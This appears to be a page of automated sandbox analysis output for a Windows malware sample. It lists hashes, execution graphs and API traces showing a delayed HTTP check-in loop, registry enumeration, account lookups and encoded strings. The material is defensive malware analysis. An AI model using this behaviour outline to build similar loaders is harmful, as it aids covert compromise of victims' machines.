                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 644bdbacdd30fcdfe798a56d09b7462c2a4c1fd41a7980299fa1415c5d6e8514
                                        • Instruction ID: ef32f5c50df30b88066297742ce1a1f536c3cb1522f6f601a3a60c0b9d8afc55
                                        • Opcode Fuzzy Hash: 644bdbacdd30fcdfe798a56d09b7462c2a4c1fd41a7980299fa1415c5d6e8514
                                        • Instruction Fuzzy Hash: 090181AB14D1606DB612E1926B1C9FB2B6AE4C2770336C86BF846CA103E2894D4FA575
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1547d9bacaaf4b448ab798397d6f661e261bcda95ec32c72eb22e63e9e90266
                                        • Instruction ID: a8b7ebaad4d4253e21658bf24d1084f9b9b0c466457c41220a81e69428b373f8
                                        • Opcode Fuzzy Hash: e1547d9bacaaf4b448ab798397d6f661e261bcda95ec32c72eb22e63e9e90266
                                        • Instruction Fuzzy Hash: 0FF049AF24D1217E7551D0826B2CDFA276EE0D2730335C82BF847CA107E2994D8F6571
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 91b1b2314358b9eb316f662b1cbbd77fabd781338f554ed0a823a6a5cb4fd383
                                        • Instruction ID: c26c16f69b8077e647a5b8b9196e9a584876b6fbb97efdca0ca685056f23f27a
                                        • Opcode Fuzzy Hash: 91b1b2314358b9eb316f662b1cbbd77fabd781338f554ed0a823a6a5cb4fd383
                                        • Instruction Fuzzy Hash: BCF06DFF24D1216D7201E0926B5C9FB276EE4C2770336C82BF846CA102E2998D8F6571
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2268575722.0000000005450000.00000040.00001000.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5450000_msqT9atzYW.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b7400e698c586c262691f16dcdfde05da6c072c61a6ab3aa6642e65de559d0de
                                        • Instruction ID: d95a0743044ff016c9687d4983470b6388334b9dab9ee2b422aea783697ed99b
                                        • Opcode Fuzzy Hash: b7400e698c586c262691f16dcdfde05da6c072c61a6ab3aa6642e65de559d0de
                                        • Instruction Fuzzy Hash: F8E065FF21D1656D7150E0962B5C9F7235ED0C1731735C827F846C6143D259498B9536

                                        Execution Graph

                                        Execution Coverage:6.6%
                                        Dynamic/Decrypted Code Coverage:0.6%
                                        Signature Coverage:11.4%
                                        Total number of Nodes:352
                                        Total number of Limit Nodes:10
                                        execution_graph 11016 f96629 11017 f964c7 2 API calls 11016->11017 11018 f9663a 11017->11018 10814 f6e0c0 recv 10815 f6e122 recv 10814->10815 10816 f6e157 recv 10815->10816 10817 f6e191 10816->10817 10818 f6e2b3 10817->10818 10823 f7c6ac 10817->10823 10830 f7c452 10823->10830 10825 f6e2ee 10826 f7c26a 10825->10826 10827 f7c292 10826->10827 10828 f7c274 10826->10828 10827->10827 10828->10827 10847 f7c297 10828->10847 10831 f7c4a8 10830->10831 10833 f7c47a 10830->10833 10831->10833 10836 f7cf6b 10831->10836 10833->10825 10834 f7c4fd __Xtime_diff_to_millis2 10834->10833 10835 f7cf6b _xtime_get GetSystemTimePreciseAsFileTime 10834->10835 10835->10834 10837 f7cf7a 10836->10837 10839 f7cf87 __aulldvrm 10836->10839 10837->10839 10840 f7cf44 10837->10840 10839->10834 10843 f7cbea 10840->10843 10844 f7cc07 10843->10844 10845 f7cbfb GetSystemTimePreciseAsFileTime 10843->10845 10844->10839 10845->10844 10850 f62ae0 10847->10850 10849 f7c2ae std::_Xinvalid_argument 10849->10828 10856 f7bedf 10850->10856 10852 f62aff 10852->10849 10854 f96cf6 10855 f62af4 10855->10852 10859 f98bec 10855->10859 10867 f7cc31 10856->10867 10860 f98bf1 10859->10860 10863 f98bfc 10860->10863 10871 f9d634 10860->10871 10878 f965ed 10863->10878 10864 f9d867 RtlAllocateHeap 10865 f9d87a __dosmaperr 10864->10865 10866 f98c2f 10864->10866 10865->10854 10866->10864 10866->10865 10868 f7cc3f InitOnceExecuteOnce 10867->10868 10870 f7bef2 10867->10870 10868->10870 10870->10855 10873 f9d640 10871->10873 10872 f965ed 2 API calls 10874 f9d82e 10872->10874 10873->10872 10875 f9d69c __cftof __dosmaperr 10873->10875 10876 f9d867 RtlAllocateHeap 10874->10876 10877 f9d87a __dosmaperr 10874->10877 10875->10863 10876->10874 10876->10877 10877->10863 10881 f964c7 10878->10881 10883 f964d5 10881->10883 10882 f96520 10882->10866 10883->10882 10886 f9652b 10883->10886 10891 f9a302 GetPEB 10886->10891 10888 f96535 10889 f9653a GetPEB 10888->10889 10890 f9654a 10888->10890 10889->10890 10892 f9a31c 10891->10892 10892->10888 10998 f67430 10999 f67465 shared_ptr 10998->10999 11003 f6755f shared_ptr 10999->11003 11004 f7d111 10999->11004 11001 f675ed 11001->11003 11008 f7d0c7 11001->11008 11005 f7d122 11004->11005 11007 f7d12a 11005->11007 11012 f7d199 11005->11012 11007->11001 11010 f7d0d6 11008->11010 11009 f7d17f 11009->11003 11010->11009 11011 f7d17b RtlWakeAllConditionVariable 11010->11011 11011->11003 11013 f7d1a7 SleepConditionVariableCS 11012->11013 11015 f7d1c0 11012->11015 11013->11015 11015->11005 11166 f68780 11167 f68786 11166->11167 11168 f96729 RtlAllocateHeap 11167->11168 11169 f68793 11168->11169 10748 f71ec0 10752 f71f5b shared_ptr __dosmaperr 10748->10752 10749 f71f68 10750 f6e530 7 API calls 10749->10750 10751 f72a26 shared_ptr std::_Xinvalid_argument 10750->10751 10752->10749 10752->10751 10759 f96729 10752->10759 10754 f7276a shared_ptr __dosmaperr 10754->10749 10754->10751 10755 f728c1 10754->10755 10762 f6e530 10755->10762 10757 f72933 10757->10751 10780 f65ee0 10757->10780 10787 f96672 10759->10787 10761 f9673b 10761->10754 10763 f6e576 10762->10763 10803 f6be30 10763->10803 10765 f6ea8f shared_ptr 10765->10757 10766 f6e7fe 10766->10765 10767 f6e530 7 API calls 10766->10767 10769 f6f786 10767->10769 10768 f6f982 shared_ptr 10768->10757 10769->10768 10770 f6e530 7 API calls 10769->10770 10772 f6fa63 10770->10772 10771 f6fb35 shared_ptr 10771->10757 10772->10771 10773 f96729 RtlAllocateHeap 10772->10773 10774 f6fce1 10773->10774 10775 f6e530 7 API calls 10774->10775 10777 f7063c 10775->10777 10776 f70880 shared_ptr 10776->10757 10777->10776 10778 f6e530 7 API calls 10777->10778 10779 f712e9 10778->10779 10782 f65f18 10780->10782 10781 f65ffe shared_ptr 10781->10751 10782->10781 10783 f66150 RegOpenKeyExA 10782->10783 10784 f66493 shared_ptr 10783->10784 10786 f661a3 __cftof 10783->10786 10784->10751 10785 f66243 RegEnumValueA 10785->10786 10786->10784 10786->10785 10788 f9667e 10787->10788 10790 f96685 __cftof __dosmaperr 10788->10790 10791 f9a8c3 10788->10791 10790->10761 10792 f9a8cf 10791->10792 10795 f9a967 10792->10795 10794 f9a8ea 10794->10790 10796 f9a98a 10795->10796 10798 f9a9d0 10796->10798 10799 f9d82f 10796->10799 10798->10794 10800 f9d83c 10799->10800 10801 f9d87a __dosmaperr 10800->10801 10802 f9d867 RtlAllocateHeap 10800->10802 10801->10798 10802->10800 10802->10801 10804 f6be82 10803->10804 10807 f6c22e shared_ptr 10803->10807 10805 f6be96 Sleep InternetOpenW InternetConnectA 10804->10805 10804->10807 10806 f6bf18 10805->10806 10808 f6bf2e HttpOpenRequestA 10806->10808 10807->10766 10809 f6bf4c shared_ptr 10808->10809 10810 f6bfee HttpSendRequestA 10809->10810 10812 f6c006 shared_ptr 10810->10812 10811 f6c08e InternetReadFile 10813 f6c0b5 10811->10813 10812->10811 10927 f76c70 10928 f76ca0 10927->10928 10931 f747b0 10928->10931 10930 f76cec Sleep 10930->10928 10934 f747eb 10931->10934 10946 f74e70 shared_ptr 10931->10946 10932 f74f59 shared_ptr 10932->10930 10935 f6be30 6 API calls 10934->10935 10934->10946 10945 f74843 shared_ptr __dosmaperr 10935->10945 10936 f75015 shared_ptr 10937 f750de shared_ptr 10936->10937 10941 f76c46 10936->10941 10961 f67d30 10937->10961 10939 f750ed 10965 f68380 10939->10965 10942 f747b0 12 API calls 10941->10942 10943 f76cec Sleep 10942->10943 10943->10941 10944 f6be30 6 API calls 10947 f74b62 shared_ptr 10944->10947 10945->10944 10945->10946 10946->10932 10957 f665e0 10946->10957 10947->10946 10950 f74390 10947->10950 10949 f75106 shared_ptr 10949->10930 10951 f743d2 10950->10951 10952 f743f8 shared_ptr 10951->10952 10953 f74646 10951->10953 10954 f74610 shared_ptr 10952->10954 10969 f73640 10952->10969 10955 f73640 9 API calls 10953->10955 10954->10946 10955->10954 10996 52d01c4 10957->10996 10959 f66692 shared_ptr 10959->10936 10962 f67d96 shared_ptr __cftof 10961->10962 10963 f67ed3 GetNativeSystemInfo 10962->10963 10964 f67ed7 shared_ptr 10962->10964 10963->10964 10964->10939 10966 f683e5 shared_ptr __cftof 10965->10966 10967 f68524 GetNativeSystemInfo 10966->10967 10968 f68403 10966->10968 10967->10968 10968->10949 10970 f73ba2 shared_ptr std::_Xinvalid_argument 10969->10970 10971 f7367f shared_ptr __dosmaperr 10969->10971 10970->10952 10971->10970 10972 f73f42 10971->10972 10974 f73c8d 10971->10974 10987 f72f10 10972->10987 10976 f71ec0 10974->10976 10980 f71f5b shared_ptr __dosmaperr 10976->10980 10977 f71f68 10978 f6e530 7 API calls 10977->10978 10979 f72a26 shared_ptr std::_Xinvalid_argument 10978->10979 10979->10970 10980->10977 10980->10979 10981 f96729 RtlAllocateHeap 10980->10981 10982 f7276a shared_ptr __dosmaperr 10981->10982 10982->10977 10982->10979 10983 f728c1 10982->10983 10984 f6e530 7 API calls 10983->10984 10985 f72933 10984->10985 10985->10979 10986 f65ee0 2 API calls 10985->10986 10986->10979 10988 f72f54 10987->10988 10989 f6e530 7 API calls 10988->10989 10990 f73513 shared_ptr __dosmaperr 10989->10990 10991 f73f42 10990->10991 10993 f7360a shared_ptr std::_Xinvalid_argument 10990->10993 10994 f73c8d 10990->10994 10992 f72f10 9 API calls 10991->10992 10992->10993 10993->10970 10995 f71ec0 9 API calls 10994->10995 10995->10993 10997 f6663f LookupAccountNameA 10996->10997 10997->10959 11019 f7a210 11020 f7a290 11019->11020 11026 f771d0 11020->11026 11022 f7a4be shared_ptr 11023 f7a2cc shared_ptr 11023->11022 11030 f63ee0 11023->11030 11025 f7a4a6 11028 f77211 __cftof 11026->11028 11027 f77446 11027->11023 11028->11027 11036 f62ec0 11028->11036 11031 f63f48 11030->11031 11035 f63f1e 11030->11035 11032 f63f58 11031->11032 11079 f62c00 11031->11079 11032->11025 11035->11025 11037 f62f06 11036->11037 11041 f62f6f 11036->11041 11038 f7c6ac GetSystemTimePreciseAsFileTime 11037->11038 11039 f62f12 11038->11039 11042 f6301e 11039->11042 11045 f62f1d __Mtx_unlock 11039->11045 11040 f62fef 11040->11027 11041->11040 11047 f7c6ac GetSystemTimePreciseAsFileTime 11041->11047 11043 f7c26a 5 API calls 11042->11043 11044 f63024 11043->11044 11046 f7c26a 5 API calls 11044->11046 11045->11041 11045->11044 11048 f62fb9 11046->11048 11047->11048 11049 f7c26a 5 API calls 11048->11049 11050 f62fc0 __Mtx_unlock 11048->11050 11049->11050 11051 f7c26a 5 API calls 11050->11051 11052 f62fd8 __Cnd_broadcast 11050->11052 11051->11052 11052->11040 11053 f7c26a 5 API calls 11052->11053 11054 f6303c 11053->11054 11055 f7c6ac GetSystemTimePreciseAsFileTime 11054->11055 11061 f63080 shared_ptr __Mtx_unlock 11055->11061 11056 f631c5 11057 f7c26a 5 API calls 11056->11057 11058 f631cb 11057->11058 11059 f7c26a 5 API calls 11058->11059 11060 f631d1 11059->11060 11062 f7c26a 5 API calls 11060->11062 11061->11056 11061->11058 11064 f631a7 11061->11064 11067 f7c6ac GetSystemTimePreciseAsFileTime 11061->11067 11063 f63193 __Mtx_unlock 11062->11063 11063->11064 11065 f7c26a 5 API calls 11063->11065 11064->11027 11066 f631dd 11065->11066 11068 f6315f 11067->11068 11068->11056 11068->11060 11068->11063 11070 f7bd4c 11068->11070 11073 f7bb72 11070->11073 11072 f7bd5c 11072->11068 11074 f7bb9c 11073->11074 11075 f7cf6b _xtime_get GetSystemTimePreciseAsFileTime 11074->11075 11076 f7bba4 __Xtime_diff_to_millis2 11074->11076 11077 f7bbcf __Xtime_diff_to_millis2 11075->11077 11076->11072 11077->11076 11078 f7cf6b _xtime_get GetSystemTimePreciseAsFileTime 11077->11078 11078->11076 11080 f62c0e 11079->11080 11086 f7b847 11080->11086 11082 f62c42 11083 f62c49 11082->11083 11092 f62c80 11082->11092 11083->11025 11085 f62c58 std::_Xinvalid_argument 11087 f7b854 11086->11087 11088 f7b873 Concurrency::details::_Reschedule_chore 11086->11088 11095 f7cb77 11087->11095 11088->11082 11090 f7b864 11090->11088 11097 f7b81e 11090->11097 11103 f7b7fb 11092->11103 11094 f62cb2 shared_ptr 11094->11085 11096 f7cb92 CreateThreadpoolWork 11095->11096 11096->11090 11098 f7b827 Concurrency::details::_Reschedule_chore 11097->11098 11101 f7cdcc 11098->11101 11100 f7b841 11100->11088 11102 f7cde1 TpPostWork 11101->11102 11102->11100 11104 f7b807 11103->11104 11105 f7b817 11103->11105 11104->11105 11107 f7ca78 11104->11107 11105->11094 11108 f7ca8d TpReleaseWork 11107->11108 11108->11105 11109 f793e0 11110 f793f5 11109->11110 11114 f79433 11109->11114 11111 f7d111 SleepConditionVariableCS 11110->11111 11112 f793ff 11111->11112 11113 f7d0c7 RtlWakeAllConditionVariable 11112->11113 11112->11114 11113->11114 11115 f787d0 11116 f7882a __cftof 11115->11116 11122 f79bb0 11116->11122 11118 f78854 11121 f7886c 11118->11121 11126 f643f0 11118->11126 11120 f788d9 std::_Throw_future_error 11123 f79be5 11122->11123 11132 f62ce0 11123->11132 11125 f79c16 11125->11118 11127 f7bedf InitOnceExecuteOnce 11126->11127 11128 f6440a 11127->11128 11129 f64411 11128->11129 11130 f96cbb 4 API calls 11128->11130 11129->11120 11131 f64424 11130->11131 11133 f62d1d 11132->11133 11134 f7bedf InitOnceExecuteOnce 11133->11134 11135 f62d46 11134->11135 11136 f62d88 11135->11136 11137 f62d51 11135->11137 11141 f7bef7 11135->11141 11148 f62440 11136->11148 11137->11125 11142 f7bf03 std::_Xinvalid_argument 11141->11142 11143 f7bf73 11142->11143 11144 f7bf6a 11142->11144 11146 f62ae0 5 API calls 11143->11146 11151 f7be7f 11144->11151 11147 f7bf6f 11146->11147 11147->11136 11161 f7b5d6 11148->11161 11150 f62472 11152 f7cc31 InitOnceExecuteOnce 11151->11152 11153 f7be97 11152->11153 11154 f7be9e 11153->11154 11157 f96cbb 11153->11157 11154->11147 11160 f96cc7 11157->11160 11158 f98bec 4 API calls 11159 f96cf6 11158->11159 11160->11158 11162 f7b5f1 std::_Xinvalid_argument 11161->11162 11163 f98bec 4 API calls 11162->11163 11165 f7b658 11162->11165 11164 f7b69f 11163->11164 11165->11150 11170 f7b92e 11171 f7b7b5 6 API calls 11170->11171 11172 f7b956 11171->11172 11173 f7b718 6 API calls 11172->11173 11174 f7b96f 11173->11174 10893 f7b8b9 10900 f7b7b5 10893->10900 10895 f7b8e1 Concurrency::details::_Reschedule_chore 10897 f7b906 10895->10897 10908 f7cbae 10895->10908 10912 f7b718 10897->10912 10899 f7b91e 10901 f7b7c1 Concurrency::details::_Reschedule_chore 10900->10901 10902 f7c6ac GetSystemTimePreciseAsFileTime 10901->10902 10903 f7b7f2 10901->10903 10904 f7b7d6 10902->10904 10903->10895 10922 f62b10 10904->10922 10906 f7b7dc __Mtx_unlock 10907 f62b10 5 API calls 10906->10907 10907->10903 10909 f7cbcc 10908->10909 10910 f7cbbc TpCallbackUnloadDllOnCompletion 10908->10910 10909->10897 10910->10909 10913 f7b724 Concurrency::details::_Reschedule_chore 10912->10913 10914 f7c6ac GetSystemTimePreciseAsFileTime 10913->10914 10915 f7b77e 10913->10915 10916 f7b739 10914->10916 10915->10899 10917 f62b10 5 API calls 10916->10917 10918 f7b73f __Mtx_unlock 10917->10918 10919 f62b10 5 API calls 10918->10919 10920 f7b75c __Cnd_broadcast 10919->10920 10920->10915 10921 f62b10 5 API calls 10920->10921 10921->10915 10923 f62b1c 10922->10923 10924 f62b1a 10922->10924 10925 f7c26a 5 API calls 10923->10925 10924->10906 10926 f62b22 ___std_exception_copy 10925->10926 10926->10906

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 767 f6be30-f6be7c 768 f6be82-f6be86 767->768 769 f6c281-f6c2a6 call f780c0 767->769 768->769 771 f6be8c-f6be90 768->771 775 f6c2d4-f6c2ec 769->775 776 f6c2a8-f6c2b4 769->776 771->769 772 f6be96-f6bf2a Sleep InternetOpenW InternetConnectA call f77a00 call f65c10 771->772 800 f6bf2e-f6bf4a HttpOpenRequestA 772->800 801 f6bf2c 772->801 780 f6c2f2-f6c2fe 775->780 781 f6c238-f6c250 775->781 778 f6c2b6-f6c2c4 776->778 779 f6c2ca-f6c2d1 call f7d663 776->779 778->779 785 f6c34f-f6c354 call f96c6a 778->785 779->775 787 f6c304-f6c312 780->787 788 f6c22e-f6c235 call f7d663 780->788 782 f6c256-f6c262 781->782 783 f6c323-f6c33f call f7cff1 781->783 790 f6c268-f6c276 782->790 791 f6c319-f6c320 call f7d663 782->791 787->785 789 f6c314 787->789 788->781 789->788 790->785 799 f6c27c 790->799 791->783 799->791 805 f6bf4c-f6bf5b 800->805 806 f6bf7b-f6bfea call f77a00 call f65c10 call f77a00 call f65c10 800->806 801->800 807 f6bf71-f6bf78 call f7d663 805->807 808 f6bf5d-f6bf6b 805->808 819 f6bfee-f6c004 HttpSendRequestA 806->819 820 f6bfec 806->820 807->806 808->807 821 f6c006-f6c015 819->821 822 f6c035-f6c05d 819->822 820->819 823 f6c017-f6c025 821->823 824 f6c02b-f6c032 call f7d663 821->824 825 f6c08e-f6c0af InternetReadFile 822->825 826 f6c05f-f6c06e 822->826 823->824 824->822 827 f6c0b5 825->827 829 f6c084-f6c08b call f7d663 826->829 830 f6c070-f6c07e 826->830 832 f6c0c0-f6c170 call f94250 827->832 829->825 830->829
                                        APIs
                                        • Sleep.KERNELBASE(000005DC), ref: 00F6BEB8
                                        • InternetOpenW.WININET(00FB8DC8,00000000,00000000,00000000,00000000), ref: 00F6BEC8
                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F6BEEC
                                        • HttpOpenRequestA.WININET(?,00000000), ref: 00F6BF36
                                        • HttpSendRequestA.WININET(?,00000000), ref: 00F6BFF6
                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 00F6C0A8
                                        • InternetCloseHandle.WININET(?), ref: 00F6C187
                                        • InternetCloseHandle.WININET(?), ref: 00F6C18F
                                        • InternetCloseHandle.WININET(?), ref: 00F6C197
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                        • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                        • API String ID: 2167506142-2254971868
                                        • Opcode ID: 5ff6d7d7b0d5cfe388b5e864077a6341fd6615b5708663e0c704f6fbefd16c98
                                        • Instruction ID: 0d80fde6acb58bb71449cfbb93bb6778b3d98346fba1acec50d25cfcd75fe1b6
                                        • Opcode Fuzzy Hash: 5ff6d7d7b0d5cfe388b5e864077a6341fd6615b5708663e0c704f6fbefd16c98
                                        • Instruction Fuzzy Hash: 8CB116B1A001189BEB24CF28CC85BEE7B75EF41304F5081A9F948972D2DB759AC4DF95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1162 f665e0-f666b8 call 52d01c4 LookupAccountNameA call f77a00 call f65c10 1169 f666bc-f666db call f622c0 1162->1169 1170 f666ba 1162->1170 1173 f6670c-f66712 1169->1173 1174 f666dd-f666ec 1169->1174 1170->1169 1175 f66715-f6671a 1173->1175 1176 f66702-f66709 call f7d663 1174->1176 1177 f666ee-f666fc 1174->1177 1175->1175 1179 f6671c-f66744 call f77a00 call f65c10 1175->1179 1176->1173 1177->1176 1180 f66937 call f96c6a 1177->1180 1190 f66746 1179->1190 1191 f66748-f66769 call f622c0 1179->1191 1185 f6693c call f96c6a 1180->1185 1189 f66941-f66946 call f96c6a 1185->1189 1190->1191 1196 f6679a-f667ae 1191->1196 1197 f6676b-f6677a 1191->1197 1203 f667b4-f667ba 1196->1203 1204 f66858-f6687c 1196->1204 1198 f66790-f66797 call f7d663 1197->1198 1199 f6677c-f6678a 1197->1199 1198->1196 1199->1185 1199->1198 1205 f667c0-f667ed call f77a00 call f65c10 1203->1205 1206 f66880-f66885 1204->1206 1222 f667f1-f66818 call f622c0 1205->1222 1223 f667ef 1205->1223 1206->1206 1207 f66887-f668ec call f780c0 * 2 1206->1207 1217 f668ee-f668fd 1207->1217 1218 f66919-f66936 call f7cff1 1207->1218 1219 f6690f-f66916 call f7d663 1217->1219 1220 f668ff-f6690d 1217->1220 1219->1218 1220->1189 1220->1219 1229 f6681a-f66829 1222->1229 1230 f66849-f6684c 1222->1230 1223->1222 1231 f6683f-f66846 call f7d663 1229->1231 1232 f6682b-f66839 1229->1232 1230->1205 1233 f66852 1230->1233 1231->1230 1232->1180 1232->1231 1233->1204
                                        APIs
                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00F66680
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AccountLookupName
                                        • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                        • API String ID: 1484870144-2309319047
                                        • Opcode ID: 29f02df39588ba55130a0eb0317bdec838532f6021ed4ee5856484579243fe11
                                        • Instruction ID: d919a138b225c25a2ac3182d1d787b26ed84899bd0b4df004b1b8bca4f32a31d
                                        • Opcode Fuzzy Hash: 29f02df39588ba55130a0eb0317bdec838532f6021ed4ee5856484579243fe11
                                        • Instruction Fuzzy Hash: 3191C0B1A001189BDB28DB28CC85BEDB779EF45304F4085EDE519E7282DA349BC4DFA5
                                        APIs
                                          • Part of subcall function 00F77A00: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00F77AEC
                                          • Part of subcall function 00F77A00: __Cnd_destroy_in_situ.LIBCPMT ref: 00F77AF8
                                          • Part of subcall function 00F77A00: __Mtx_destroy_in_situ.LIBCPMT ref: 00F77B01
                                          • Part of subcall function 00F6BE30: Sleep.KERNELBASE(000005DC), ref: 00F6BEB8
                                          • Part of subcall function 00F6BE30: InternetOpenW.WININET(00FB8DC8,00000000,00000000,00000000,00000000), ref: 00F6BEC8
                                          • Part of subcall function 00F6BE30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F6BEEC
                                          • Part of subcall function 00F6BE30: HttpOpenRequestA.WININET(?,00000000), ref: 00F6BF36
                                        • std::_Xinvalid_argument.LIBCPMT ref: 00F74F92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleepXinvalid_argumentstd::_
                                        • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                        • API String ID: 4201286991-1982281295
                                        • Opcode ID: 908915080f2d46ff7272fcb2922e8646173ee70b245322ea727941332def6c28
                                        • Instruction ID: e9ca08bd0bca9e7132eb981871d869223794aee2332b90db04c41e3c7ce4fa6b
                                        • Opcode Fuzzy Hash: 908915080f2d46ff7272fcb2922e8646173ee70b245322ea727941332def6c28
                                        • Instruction Fuzzy Hash: 72233371A002588BEB19DB28CD89B9DBB76AF81304F54C1D9E00CA72C2DB795F84DF52

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
